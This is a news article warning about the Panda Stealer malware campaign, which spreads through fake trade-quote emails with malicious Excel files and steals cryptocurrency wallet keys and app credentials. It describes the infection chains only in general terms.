New Panda Stealer malware goes after cryptocurrency wallets
By Bob Garcia
Beware of trade quotes masquerading as Excel files
Threats in the cryptocurrency world have not yet stopped and several wallets could be at risk if action is not taken as soon as possible. According to several researchers, a new variant of cryptocurrency fraud has come to light, which uses a file-less approach in its global spam distribution campaign in order to avoid detection and get away with whatever action it plans on committing, including the theft of digital assets.
“Panda Stealer” seems to be the nickname of the gang behind this malware, and their modus operandi is based on emails that look like requests for trade quotes in order to lure recipients into opening malicious Excel files, and that’s where all the action kicks off. According to several investigations carried out so far, it has been noted that people in the United States, Australia, Japan and Germany have been targeted by this malware, a modification of Collector Stealer.
Trend Micro researchers have done their homework so far, and as a result, identified two infection chains. The first uses an.XLSM attachment containing different macros that download a loader, which then downloads and executes the main stealer. The second method relies on a string within an XLS file that contains an Excel template, and seeks to gain access to paste.ee, a Pastebin alternative, which accesses a second encrypted PowerShell command.
Once this whole process is successfully accomplished and the installation on the device is complete, the Panda Stealer has the option to access and collect private keys and past transaction records from the victim’s digital currency wallets, including Dash, Bytecoin, Litecoin, and Ethereum. “Not only does it target cryptocurrency wallets, but it can steal credentials from other applications, such as NordVPN, Telegram, the Discord chat app, and Steam,” researchers note. So far, researchers have been able to identify an IP address used by the attackers and are doing their best to stop this attack as soon as possible.